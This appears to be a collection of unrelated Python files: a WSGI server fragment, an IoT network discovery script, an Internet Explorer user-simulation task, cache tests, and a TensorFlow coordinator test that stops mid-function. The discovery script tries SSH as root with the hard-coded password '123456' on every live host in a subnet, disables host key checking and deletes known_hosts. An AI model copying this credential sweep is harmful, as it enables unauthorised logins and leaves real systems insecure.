new_socket.send(response.encode("utf-8"))
# Must close again here to release the underlying file descriptor
new_socket.close()
def runserver(self):
"""主函数: 整体控制"""
while True:
# 4. Wait for a new client connection
new_socket, client_addr = self.listen_server.accept()
# 5. Serve this client in a child process
p = multiprocessing.Process(target=self.service_client, args=(new_socket, ))
p.start()
# In a process-based concurrent server the parent must also call new_socket.close() here; reason: the child holds its own copy of the file descriptor (fd)
new_socket.close()
# Close the listening socket
self.listen_server.close()
if __name__ == '__main__':
ip = ''
port = 8888
wsgi_server = WSGIServer(ip, port)
wsgi_server.runserver()
|
main.py
|
#! /usr/bin/env python
import subprocess
# try to import these libraries or install them
try:
import ipaddress
except:
print "install ipaddress"
subprocess.call("pip install ipaddress", shell=True)
import ipaddress
try:
import pexpect
except:
print "install pexpect"
subprocess.call("pip install pexpect", shell=True)
import pexpect
import datetime
import os
import threading
import time
import socket
import message
from iot_device import iot_device
import re
import auxiliary_functions
from message import update_queue
from message import Message
import listen
from constant_variable import *
########################### GLOBAL VALUES #####################
devices = [] #IOT devices
threads = [] #ip threads to ping and check
pos_ips = [] # possible ips to check if they are iot devices
# remove all known hosts and copy backup at known_hosts-old
try:
subprocess.call("cp -av ~/.ssh/known_hosts ~/.ssh/known_hosts-old", shell=False)
subprocess.call("rm ~/.ssh/known_hosts", shell=False)
except:
pass
# Prompt the user to input a network address
net_addr =auxiliary_functions.get_range()
# u'192.168.43.0/24'
# Create the network
ip_net = ipaddress.ip_network(net_addr)
# Get all hosts on that network
all_hosts = list(ip_net.hosts())
# Configure subprocess to hide the console window
info = None
if os.name == 'nt':
info = subprocess.STARTUPINFO()
# use an ssh command on the remote device to return the device name
def ssh(host, cmd, user, password, timeout=10, bg_run=False):
result = None
try:
options = '-q -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -oPubkeyAuthentication=no'
if bg_run:
options += ' -f'
ssh_cmd = 'ssh %s@%s %s "%s"' % (user, host, options, cmd)
ssh_newkey = 'Do you want to continue connecting?'
p = pexpect.spawn(ssh_cmd, timeout=timeout)
i = p.expect([ssh_newkey, 'password:', pexpect.EOF])
if i == 0:
p.sendline('y')
i = p.expect([ssh_newkey, 'password:', pexpect.EOF])
if i == 1:
p.sendline(password)
p.expect(pexpect.EOF)
result = p.before
elif i == 2:
result = 'Unknown'
except:
result = 'Unknown'
return result
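# Example call (added commentary; the host below is hypothetical, credentials
# match those used by ssh_start):
#   ssh('192.168.43.10', 'uname -n', 'root', '123456')
# returns the command output (here the remote hostname), or 'Unknown' if the
# connection or login fails.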
# ping function to run on any host in the LAN
def ping_host(i):
output = subprocess.Popen(['ping', '-c', '1', '-w', '1', str(all_hosts[i])], stdout=subprocess.PIPE,
startupinfo=info).communicate()[0]
if " 0 packets received, 100% packet loss" in output.decode('utf-8'):
return
elif "Request timed out" in output.decode('utf-8'):
return
else:
ip = str(all_hosts[i])
my_ips = str(auxiliary_functions.my_ip_address())
if my_ips != ip:
pos_ips.append(ip)
return
# run the ssh function and append to the iot devices list if the ip belongs to an iot device
def ssh_start(ip):
name = ssh(ip,'uname -n','root','123456')
if name != 'Unknown':
name = re.sub("[^a-zA-Z0-9]", '',name)
devices.append(iot_device(name, ip, False))
return
# print scanning and dots every 2 iterations
def progress(count):
if count == 0:
print "Scanning"
elif count % 2 ==0:
print "..."
return count +1
# scan for devices in the LAN - run on 255 ips
def scan():
global threads
global devices
global pos_ips
pos_ips = []
devices = []
count = 0
# run 255 threads to ping and check who is active
for i in range(0, 11):
count=progress(count)
s = v = 25
if i == 0:
f = 1
else:
f = i*s
if i == 10:
v = 4
for j in range(f, (i * s) + v):
t = threading.Thread(target=ping_host,args=(j,))
threads.append(t)
t.start()
for t in threads:
t.join(10)
threads = []
# run threads on the active ip's in the LAN to get NAME
for i in range(len(pos_ips)):
t = threading.Thread(target=ssh_start,args=(pos_ips[i],))
threads.append(t)
t.start()
for t in threads:
t.join(10)
threads = []
# append my device and sort by ip
devices.append(iot_device(socket.gethostname(), auxiliary_functions.my_ip_address(), False))
devices = sorted(devices, key=lambda iot_device: int(iot_device.ip.split('.')[3]))
find_master = False
if devices[0].ip != auxiliary_functions.my_ip_address():
for device in devices:
if device.ip != auxiliary_functions.my_ip_address():
message = Message(device,None, CHECKS_THAT_MASTER_IS_ALIVE, MESSAGE_TO_MASTER_IS_ALIVE)
res = auxiliary_functions.send_message(message)
if res != None:
device.master = True
find_master = True
master = devices.pop(devices.index(device))
message = Message(device,None,YOU_ARE_THE_MASTER,"You are the master")
auxiliary_functions.send_message(message)
break
if not find_master:
for device in devices:
if device.ip == auxiliary_functions.my_ip_address():
master = devices.pop(devices.index(device))
device.master = True
print "I am the master ,%s is not active" % (devices[0].name)
devices = [master] + sorted(devices, key=lambda iot_device: int(iot_device.ip.split('.')[3]))
else:
devices[0].master = True
# update the master in queue
update_queue(devices[0])
print "==============="
for device in devices:
print device
print "==============="
if devices[0].ip == auxiliary_functions.my_ip_address():
for device in devices[1:]:
message = Message(device,None,GET_FROM_MASTER,devices[0].ip+'|'+devices[0].name)
auxiliary_functions.send_message(message)
# message.add_to_queue()
open("master alive", 'w').write("T")
pid = os.fork()
if pid == 0:
auxiliary_functions.send_messages(devices)
devices = scan()
listen.start_sense(devices)
os._exit(0)
return devices
# check if this device is the master in our network
def i_am__the_master():
if auxiliary_functions.my_ip_address() == devices[0].ip:
return True
return False
# ======= MAIN ========
if __name__ == '__main__':
if not auxiliary_functions.file_exist(MESSAGE_QUEUE_FILE):
open(MESSAGE_QUEUE_FILE,"w")
scan()
pid = os.fork()
if pid == 0:
listen.start_sense(devices)
os._exit(0)
else:
listen.listen(devices, pid)
|
iebrowser.py
|
# Copyright 2017 Carnegie Mellon University. See LICENSE.md file for terms.
# Ali Kidwai
# July 26, 2017
# Adapted from code written by Rotem Guttman and Joe Vessella
import functools
import platform
import queue
import random
import threading
import time
import traceback
import psutil
try:
import pythoncom
import win32api
import win32com.client
import win32con
import win32process
except ImportError:
# Tasks must be importable on any platform.
pass
import api
from tasks import browser
class IEManager(object):
""" Allows different InternetExplorer tasks to share one instance of Internet Explorer. Spawns a new consumer thread
to visit sites so that UserSim doesn't block while waiting for sites to load.
"""
_action_queue = None
_ie = None
_persist = True
def __new__(cls):
""" Initialize the action queue and spawn a consumer thread if the IEManager hasn't already been created.
"""
if cls._action_queue is None:
cls._action_queue = queue.Queue()
t = threading.Thread(target=cls._action_executor)
t.daemon = True
t.start()
cls._action_queue.put((cls._start_ie, 0, 10))
return cls
@classmethod
def _action_executor(cls):
""" Target function for the consumer thread. Executes actions from the action queue. If the main User Sim thread
calls IEManager.close_browser(), then the consumer thread will finish any actions remaining on the queue, close
the browser window, and reset the class variables.
"""
while cls._persist or not cls._action_queue.empty():
try:
# Without the timeout, this would block forever if cls._persist is set to False after the get call
# already started.
action, task_id, delay = cls._action_queue.get(timeout=1)
except queue.Empty:
continue
else:
try:
action()
except Exception:
api.add_feedback(task_id, traceback.format_exc())
time.sleep(delay)
cls._action_queue = None
cls._persist = True
try:
cls._ie.Quit()
except Exception:
# Try to kill it. If not, oh well.
try:
for process in psutil.process_iter():
if 'iexplore' in process.name():
process.kill()
except Exception:
pass
finally:
cls._ie = None
@classmethod
def get(cls, site, task_id, delay=0):
""" Add a _visit_site action to the action queue.
"""
# Use functools.partial so that the action doesn't need any arguments
cls._action_queue.put((functools.partial(cls._visit_site, site), task_id, delay))
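# Usage sketch (added commentary; the URL is a placeholder and task_id is
# whatever id the calling task holds):
#   IEManager().get('http://example.com', task_id)
# queues the visit; the consumer thread performs it without blocking the caller.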
@classmethod
def status(cls):
if not cls._ie:
return 'IE has not yet been fully started.'
if cls._ie.Busy:
return 'IE reports that it is loading a web page.'
else:
return 'IE is idle.'
@classmethod
def close_browser(cls):
""" Sets _persist to False so that the consumer thread breaks out of its loop.
"""
cls._persist = False
@classmethod
def _start_ie(cls):
""" Create an instance of Internet Explorer.
"""
pythoncom.CoInitialize()
cls._ie = win32com.client.gencache.EnsureDispatch('InternetExplorer.Application')
cls._ie.Visible = True
@classmethod
def _visit_site(cls, site):
""" Navigate to site and wait for Internet Explorer to either time out or finish loading.
"""
cls._ie.Navigate(site)
cls._wait_for_ie()
@classmethod
def _wait_for_ie(cls):
""" Wait for Internet Explorer to either time out or finish loading. If it times out, try to terminate it.
"""
start = time.time()
while cls._ie.Busy or cls._ie.Document.readyState != 'complete':
if time.time() - start >= 200: # IE timed out; terminate it.
_, pid = win32process.GetWindowThreadProcessId(cls._ie.HWND)
handle = win32api.OpenProcess(win32con.PROCESS_TERMINATE, 0, pid)
if handle:
win32api.TerminateProcess(handle, 0)
win32api.CloseHandle(handle)
class IEBrowser(browser.Browser):
""" Opens an instance of Internet Explorer and visits a website at random from the configuration. Windows-only.
"""
def __init__(self, config):
if not platform.system() == 'Windows':
raise OSError('This task is only compatible with Windows.')
super().__init__(config)
self._close = config['close_browser']
self._driver = IEManager()
def __call__(self):
super().__call__()
if self._close:
self._driver.close_browser()
@classmethod
def parameters(cls):
""" Returns a dictionary with the required and optional parameters of the class, with human-readable
descriptions for each.
Returns:
dict of dicts: A dictionary whose keys are 'required' and 'optional', and whose values are dictionaries
containing the required and optional parameters of the class as keys and human-readable (str)
descriptions and requirements for each key as values.
"""
params = super().parameters()
params['optional']['close_browser'] = 'bool| If True, the browser window will close after visiting a website. '\
'Defaults to False.'
return params
@classmethod
def validate(cls, config):
""" Validates the given configuration dictionary. Makes sure that each site in config['sites'] is a string, but
doesn't actually check to see if they are valid web addresses.
Args:
config (dict): The dictionary to validate. Its keys and values are subclass-specific.
Raises:
KeyError: If a required configuration option is missing. The error message is the missing key.
ValueError: If a configuration option's value is not valid. The error message is in the following format:
key: value requirement
Returns:
dict: The dict given as the config argument with missing optional parameters added with default values.
"""
extra_defaults = {'close_browser': False}
return super().validate(config, extra_defaults=extra_defaults)
|
test_cache.py
|
# -*- coding: utf-8 -*-
import cachetools
import pytest
import six
import threading
import large_image.cache_util.cache
from large_image import config
from large_image.cache_util import cached, strhash, Cache, MemCache, \
methodcache, LruCacheMetaclass, cachesInfo, cachesClear, getTileCache
class Fib(object):
def num(self, k):
if k > 2:
return self.num(k - 1) + self.num(k - 2)
else:
return 1
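# Note (added commentary): without caching, the naive recursion above is
# exponential in k; the cached wrapper built in cache_test is what makes
# num(100) == 354224848179261915075 feasible to assert.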
def cache_test(specific_cache, maxNum=100):
temp = Fib()
temp.num = cached(cache=specific_cache, key=strhash)(temp.num)
temp.num(maxNum)
if maxNum >= 3:
assert temp.num(3) == 2
if maxNum >= 100:
assert temp.num(100) == 354224848179261915075
def testLRUCacheTools():
cache_test(Cache(1000))
def testCacheMemcached():
cache_test(MemCache())
def testCheckCacheMemcached():
cache = MemCache()
cache_test(cache)
val = cache['(2,)']
assert val == 1
val = cache['(100,)']
assert val == 354224848179261915075
def testBadMemcachedUrl():
# go through and check if all 100 fib numbers are in the cache
# it is stored in cache as ('fib', #)
cache = MemCache(url=['192.0.2.254', '192.0.2.253'])
cache_test(cache, 3)
with pytest.raises(KeyError):
cache['(2,)']
def testGetTileCachePython():
large_image.cache_util.cache._tileCache = None
large_image.cache_util.cache._tileLock = None
config.setConfig('cache_backend', 'python')
tileCache, tileLock = getTileCache()
assert isinstance(tileCache, cachetools.LRUCache)
def testGetTileCacheMemcached():
large_image.cache_util.cache._tileCache = None
large_image.cache_util.cache._tileLock = None
config.setConfig('cache_backend', 'memcached')
tileCache, tileLock = getTileCache()
assert isinstance(tileCache, MemCache)
class TestClass(object):
def testLRUThreadSafety(self):
# The cachetools LRU cache is not thread safe, and if two threads ask
# to evict an old value concurrently, the cache will raise a KeyError
# and then be in a broken state. Test that we fall back gracefully in
# this case. Better is to use a threading lock when setting the
# cache, which should never have the problem.
self.cache = cachetools.LRUCache(10)
self.cache_lock = None
loopSize = 10000
sumDelta = 2
def keyFunc(x):
return x
@methodcache(keyFunc)
def add(self, x):
return x + sumDelta
def loop():
sum = 0
for x in range(loopSize):
sum += add(self, x)
sums.append(sum)
# Without a thread lock
sums = []
threadList = [threading.Thread(target=loop) for t in range(5)]
for t in threadList:
t.start()
for t in threadList:
t.join()
for sum in sums:
assert sum == loopSize * (loopSize - 1) / 2 + loopSize * sumDelta
# With a thread lock
self.cache = cachetools.LRUCache(10)
self.cache_lock = threading.Lock()
sums = []
threadList = [threading.Thread(target=loop) for t in range(5)]
for t in threadList:
t.start()
for t in threadList:
t.join()
for sum in sums:
assert sum == loopSize * (loopSize - 1) / 2 + loopSize * sumDelta
@six.add_metaclass(LruCacheMetaclass)
class ExampleWithMetaclass(object):
cacheName = 'test'
cacheMaxSize = 4
def __init__(self, arg):
pass
def testCachesInfo(self):
large_image.cache_util.cache._tileCache = None
large_image.cache_util.cache._tileLock = None
assert cachesInfo()['test']['used'] == 0
assert 'tileCache' not in cachesInfo()
self.ExampleWithMetaclass('test')
assert cachesInfo()['test']['used'] == 1
config.setConfig('cache_backend', 'python')
getTileCache()
assert 'tileCache' in cachesInfo()
large_image.cache_util.cache._tileCache = None
large_image.cache_util.cache._tileLock = None
config.setConfig('cache_backend', 'memcached')
getTileCache()
# memcached won't show that it is present
assert 'tileCache' not in cachesInfo()
def testCachesClear(self):
large_image.cache_util.cache._tileCache = None
large_image.cache_util.cache._tileLock = None
config.setConfig('cache_backend', 'python')
self.ExampleWithMetaclass('test')
getTileCache()
assert cachesInfo()['test']['used'] == 1
cachesClear()
assert cachesInfo()['test']['used'] == 0
|
distribute_coordinator_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Distribute Coordinator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import copy
import json
import os
import sys
import threading
import time
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error: # pylint: disable=invalid-name
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.distribute import distribute_coordinator
from tensorflow.python.distribute import distribute_coordinator_context
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import monitored_session
CHIEF = distribute_coordinator._TaskType.CHIEF
WORKER = distribute_coordinator._TaskType.WORKER
PS = distribute_coordinator._TaskType.PS
EVALUATOR = distribute_coordinator._TaskType.EVALUATOR
STANDALONE_CLIENT = distribute_coordinator.CoordinatorMode.STANDALONE_CLIENT
INDEPENDENT_WORKER = distribute_coordinator.CoordinatorMode.INDEPENDENT_WORKER
NUM_WORKERS = 3
NUM_PS = 2
original_sys_exit = sys.exit
def _bytes_to_str(maybe_bytes):
if isinstance(maybe_bytes, six.string_types):
return maybe_bytes
else:
return str(maybe_bytes, "utf-8")
def _strip_protocol(target):
# cluster_spec expects "host:port" strings.
if "//" in target:
return target.split("//")[1]
else:
return target
class MockStrategy(object):
def __init__(self,
between_graph=False,
should_init=None,
should_checkpoint=None,
should_save_summary=None):
self._between_graph = between_graph
self._should_init = should_init
self._should_checkpoint = should_checkpoint
self._should_save_summary = should_save_summary
@property
def between_graph(self):
return self._between_graph
def configure(self,
session_config=None,
cluster_spec=None,
task_type=None,
task_id=None):
if self._should_init is None:
if task_id == 0:
self._should_init = True
else:
self._should_init = False
if self._should_checkpoint is None:
if task_id == 0:
self._should_checkpoint = True
else:
self._should_checkpoint = False
if self._should_save_summary is None:
if task_id == 0:
self._should_save_summary = True
else:
self._should_save_summary = False
if session_config:
if (cluster_spec and task_type and task_id is not None and
self._between_graph):
session_config.intra_op_parallelism_threads += 1
if task_type in ["chief", "worker"]:
session_config.device_filters.extend(
["/job:%s/task:%d" % (task_type, task_id), "/job:ps"])
else:
session_config.inter_op_parallelism_threads += 1
session_config.device_filters.append("/job:somejob")
@property
def should_init(self):
return self._should_init
@property
def should_checkpoint(self):
return self._should_checkpoint
@property
def should_save_summary(self):
return self._should_save_summary
class MockServer(object):
def __init__(self):
self._joined = False
self._started = False
def start(self):
self._started = True
def join(self):
assert not self._joined
self._joined = True
@property
def joined(self):
return self._joined
@property
def started(self):
return self._started
class DistributeCoordinatorTestBase(test.TestCase):
@classmethod
def setUpClass(cls):
# We have to create a global in-process cluster because once an in-process
# tensorflow server is created, there is no way to terminate it. Please see
# multi_worker_test_base.py for more details.
# TODO(yuefengz): use the utility from multi_worker_test_base.
cls._workers, cls._ps = test_util.create_local_cluster(
NUM_WORKERS, num_ps=NUM_PS)
cls._cluster_spec = {
WORKER: [
_strip_protocol(_bytes_to_str(w.target)) for w in cls._workers
],
PS: [_strip_protocol(_bytes_to_str(ps.target)) for ps in cls._ps]
}
def setUp(self):
self._result_correct = 0
self._lock = threading.Lock()
self._worker_context = {}
self._strategy_property = {}
self._std_servers = {}
self._barrier = distribute_coordinator._Barrier(NUM_WORKERS)
@contextlib.contextmanager
def _test_session(self, target):
config = config_pb2.ConfigProto(allow_soft_placement=True)
config.graph_options.optimizer_options.opt_level = -1
with session.Session(graph=None, config=config, target=target) as sess:
yield sess
# TODO(yuefengz): use the utility from multi_worker_test_base.
def _create_cluster_spec(self,
has_chief=False,
num_workers=1,
num_ps=0,
has_eval=False):
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
cluster_spec = {}
if has_chief:
cluster_spec[CHIEF] = ["localhost:%s" % portpicker.pick_unused_port()]
if num_workers:
cluster_spec[WORKER] = [
"localhost:%s" % portpicker.pick_unused_port()
for _ in range(num_workers)
]
if num_ps:
cluster_spec[PS] = [
"localhost:%s" % portpicker.pick_unused_port() for _ in range(num_ps)
]
if has_eval:
cluster_spec[EVALUATOR] = ["localhost:%s" % portpicker.pick_unused_port()]
return cluster_spec
def _in_graph_worker_fn(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
with self._test_session(target=context.master_target) as sess:
xs = []
expected = 0.0
for i in range(context.num_workers):
with ops.device("/job:worker/task:%d" % i):
x = variable_scope.get_variable("x_%d" % i, initializer=10.0)
x_add = x.assign_add(float(i))
xs.append(x_add)
expected += i + 10.0
with ops.device("/job:worker/task:0"):
result = math_ops.add_n(xs)
variables.global_variables_initializer().run()
result_value = sess.run(result)
self.assertEqual(result_value, expected)
if result_value == expected:
self._result_correct += 1
def _run_coordinator_in_thread(self, worker_fn, strategy, **kwargs):
t = threading.Thread(
target=distribute_coordinator.run_distribute_coordinator,
args=(worker_fn, strategy),
kwargs=kwargs)
t.start()
return t
def _run_multiple_coordinator_in_threads(self, worker_fn, strategy,
cluster_spec, **kwargs):
threads = {}
for task_type in cluster_spec.keys():
threads[task_type] = []
for task_id in range(len(cluster_spec[task_type])):
t = self._run_coordinator_in_thread(
worker_fn,
strategy,
cluster_spec=cluster_spec,
task_type=task_type,
task_id=task_id,
**kwargs)
threads[task_type].append(t)
return threads
def _between_graph_worker_fn(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
with self._test_session(target=context.master_target) as sess:
with ops.device("/job:ps/task:0"):
# TODO(yuefengz): investigate why not using a resource variable makes
# the test flaky.
x = variable_scope.get_variable(
"x", initializer=10.0, use_resource=True)
with ops.device("/job:ps/task:1"):
y = variable_scope.get_variable(
"y", initializer=20.0, use_resource=True)
x_add = x.assign_add(2.0)
y_sub = y.assign_sub(2.0)
train_op = control_flow_ops.group([x_add, y_sub])
if context.is_chief:
variables.global_variables_initializer().run()
# Synchronize workers after initialization.
if context.has_barrier:
context.wait_for_other_workers()
else:
while True:
uninit_vars = sess.run(variables.report_uninitialized_variables())
# pylint: disable=g-explicit-length-test
if len(uninit_vars) == 0:
break
sess.run(train_op)
# Synchronize workers after one step to make sure they all have finished
# training.
if context.has_barrier:
context.wait_for_other_workers()
else:
self._barrier.wait()
x_val, y_val = sess.run([x, y])
self.assertEqual(x_val, 16.0)
self.assertEqual(y_val, 14.0)
if x_val == 16.0 and y_val == 14.0:
with self._lock:
self._result_correct += 1
def _between_graph_with_monitored_session(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
with ops.device("/job:ps/task:0"):
# TODO(yuefengz): investigate why not using a resource variable makes
# the test flaky.
x = variable_scope.get_variable("xx", initializer=10.0, use_resource=True)
with ops.device("/job:ps/task:1"):
y = variable_scope.get_variable("yy", initializer=20.0, use_resource=True)
x_add = x.assign_add(2.0)
y_sub = y.assign_sub(2.0)
train_op = control_flow_ops.group([x_add, y_sub])
# The monitored session will run init or ready ops.
with monitored_session.MonitoredSession() as sess:
sess.run(train_op)
# Synchronize workers after one step to make sure they all have finished
# training.
if context.has_barrier:
context.wait_for_other_workers()
else:
self._barrier.wait()
x_val, y_val = sess.run([x, y])
self.assertEqual(x_val, 16.0)
self.assertEqual(y_val, 14.0)
if x_val == 16.0 and y_val == 14.0:
with self._lock:
self._result_correct += 1
def _dump_worker_context(self, strategy):
"""Dumps the propoerties of each worker context.
It dumps the context properties to a dict mapping from task_type to a list
of tuples of master_target, num_workers, is_chief and distribute_mode, where
the list is indexed by the task_id.
Args:
strategy: a `DistributionStrategy` object.
"""
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
task_type = str(context.task_type)
task_id = context.task_id or 0
with self._lock:
if task_type not in self._worker_context:
self._worker_context[task_type] = []
while len(self._worker_context[task_type]) <= task_id:
self._worker_context[task_type].append(None)
self._worker_context[task_type][task_id] = (context.master_target,
context.num_workers,
context.is_chief,
context.distributed_mode)
def _dump_strategy_property(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
self.assertEqual(context._strategy.should_init, strategy.should_init)
self.assertEqual(context.should_checkpoint, strategy.should_checkpoint)
self.assertEqual(context.should_save_summary, strategy.should_save_summary)
task_type = str(context.task_type)
task_id = context.task_id or 0
with self._lock:
if task_type not in self._strategy_property:
self._strategy_property[task_type] = []
while len(self._strategy_property[task_type]) <= task_id:
self._strategy_property[task_type].append(None)
self._strategy_property[task_type][task_id] = (
context._strategy.should_init, context.should_checkpoint,
context.should_save_summary)
def _run_mock_std_server(self,
session_config=None,
cluster_spec=None,
task_type=None,
task_id=None,
rpc_layer=None,
environment=None):
task_type = str(task_type)
task_id = task_id or 0
with self._lock:
if task_type not in self._std_servers:
self._std_servers[task_type] = []
while len(self._std_servers[task_type]) <= task_id:
self._std_servers[task_type].append(None)
server = MockServer()
self._std_servers[task_type][task_id] = server
return server
class DistributeCoordinatorTestStandaloneMode(DistributeCoordinatorTestBase):
def testInGraphStandaloneMode(self):
"""Test it runs in-graph replication in standalone client mode."""
distribute_coordinator.run_distribute_coordinator(
self._in_graph_worker_fn,
MockStrategy(between_graph=False),
cluster_spec=self._cluster_spec)
self.assertEqual(self._result_correct, 1)
def testBetweenGraph(self):
"""Test it runs between-graph replication in standalone client mode."""
distribute_coordinator.run_distribute_coordinator(
self._between_graph_worker_fn,
MockStrategy(between_graph=True),
cluster_spec=self._cluster_spec)
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphWithMonitoredSession(self):
"""Test monitored session in standalone client mode."""
distribute_coordinator.run_distribute_coordinator(
self._between_graph_with_monitored_session,
MockStrategy(between_graph=True),
cluster_spec=self._cluster_spec)
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphContext(self):
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=True),
cluster_spec=self._cluster_spec)
# There is only one type of task and there are three such tasks.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue(WORKER in self._worker_context)
self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context[WORKER][0],
(_bytes_to_str(self._workers[0].target), NUM_WORKERS, True, True))
self.assertEqual(
self._worker_context[WORKER][1],
(_bytes_to_str(self._workers[1].target), NUM_WORKERS, False, True))
self.assertEqual(
self._worker_context[WORKER][2],
(_bytes_to_str(self._workers[2].target), NUM_WORKERS, False, True))
def testBetweenGraphStrategyProperties(self):
# Dumps properties of the strategy objects.
distribute_coordinator.run_distribute_coordinator(
self._dump_strategy_property,
MockStrategy(between_graph=True, should_init=True),
cluster_spec=self._cluster_spec)
# There is only one type of task and there are three such tasks.
self.assertEqual(len(self._strategy_property), 1)
self.assertTrue(WORKER in self._strategy_property)
self.assertEqual(len(self._strategy_property[WORKER]), NUM_WORKERS)
# Check whether each task has the right properties of should_init,
# should_checkpoint and should_save_summary.
self.assertEqual(self._strategy_property[WORKER][0], (True, True, True))
self.assertEqual(self._strategy_property[WORKER][1], (True, False, False))
self.assertEqual(self._strategy_property[WORKER][2], (True, False, False))
def testInGraphContext(self):
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec=self._cluster_spec)
# There is only a "None" task in the dumped task context.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue("None" in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context["None"][0],
(_bytes_to_str(self._workers[0].target), NUM_WORKERS, True, True))
def testLocalContext(self):
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec=None)
# There is only a "None" task.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue("None" in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context["None"][0], ("", 0, True, False))
def testBetweenGraphContextWithChief(self):
# Adds a chief node, so there are NUM_WORKERS + 1 workers in total.
cluster_spec = copy.deepcopy(self._cluster_spec)
cluster_spec[CHIEF] = ["fake_chief"]
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=True),
cluster_spec=cluster_spec,
rpc_layer="grpc")
# There are one CHIEF and three workers.
self.assertEqual(len(self._worker_context), 2)
self.assertTrue(CHIEF in self._worker_context)
self.assertTrue(WORKER in self._worker_context)
self.assertEqual(len(self._worker_context[CHIEF]), 1)
self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context[CHIEF][0],
("grpc://fake_chief", 4, True, True))
self.assertEqual(
self._worker_context[WORKER][0],
(_bytes_to_str(self._workers[0].target), NUM_WORKERS + 1, False, True))
self.assertEqual(
self._worker_context[WORKER][1],
(_bytes_to_str(self._workers[1].target), NUM_WORKERS + 1, False, True))
self.assertEqual(
self._worker_context[WORKER][2],
(_bytes_to_str(self._workers[2].target), NUM_WORKERS + 1, False, True))
def testInGraphContextWithEval(self):
# Adds an EVALUATOR job.
cluster_spec = copy.deepcopy(self._cluster_spec)
cluster_spec[EVALUATOR] = ["fake_evaluator"]
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec=cluster_spec,
rpc_layer=None)
# There are one "None" task and one EVALUATOR task.
self.assertEqual(len(self._worker_context), 2)
self.assertTrue("None" in self._worker_context)
self.assertTrue(EVALUATOR in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
self.assertEqual(len(self._worker_context[EVALUATOR]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context["None"][0], (_strip_protocol(
_bytes_to_str(self._workers[0].target)), 3, True, True))
self.assertEqual(self._worker_context[EVALUATOR][0],
("fake_evaluator", 3, True, False))
class DistributeCoordinatorTestIndependentWorkerMode(
DistributeCoordinatorTestBase):
def testInGraph(self):
cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
threads = self._run_multiple_coordinator_in_threads(
self._in_graph_worker_fn,
MockStrategy(between_graph=False),
cluster_spec,
mode=INDEPENDENT_WORKER)
threads[WORKER][0].join()
self.assertEqual(self._result_correct, 1)
def testBetweenGraph(self):
cluster_spec = self._create_cluster_spec(
num_workers=NUM_WORKERS, num_ps=NUM_PS)
threads = self._run_multiple_coordinator_in_threads(
self._between_graph_worker_fn,
MockStrategy(between_graph=True),
cluster_spec,
mode=INDEPENDENT_WORKER)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphWithMonitoredSession(self):
cluster_spec = self._create_cluster_spec(
num_workers=NUM_WORKERS, num_ps=NUM_PS)
threads = self._run_multiple_coordinator_in_threads(
self._between_graph_with_monitored_session,
MockStrategy(between_graph=True),
cluster_spec,
mode=INDEPENDENT_WORKER)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphContext(self):
